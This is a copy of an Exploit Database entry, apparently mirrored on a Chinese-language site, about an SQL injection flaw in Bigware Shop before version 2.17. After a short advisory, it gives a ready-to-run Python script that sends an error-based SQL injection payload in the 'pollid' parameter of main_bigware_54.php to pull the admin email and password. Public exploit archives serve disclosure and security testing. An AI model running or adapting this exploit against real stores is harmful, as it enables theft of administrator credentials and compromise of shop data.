Bigware Shop 2.1x – ‘main_bigware_54.php’ SQL Injection

• Exploit Database
• 112 阅读

• 作者： rwenzel
  日期： 2012-06-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37354/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  source: https://www.securityfocus.com/bid/53810/info   Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.   A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.   Bigware Shop versions prior to 2.17 are vulnerable.   #!/usr/bin/python # -*- coding: utf-8 -*- import httplib2 import urllib import sys   # insert your target link here (with trailing slash) url = "http://www.example.com/" h = httplib2.Http()   # send sql injection headerdata = {'Content-type': 'application/x-www-form-urlencoded'} sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' postdata = {'voteid' : '2', \ 'pollid' : sqli, \ 'x' : '1', \ 'y' : '1', \ 'forwarder' : 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2'} response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata)) print content, "\n", "\n" print "If there is an error stating the duplicate admin entry, your shop is vulnerable."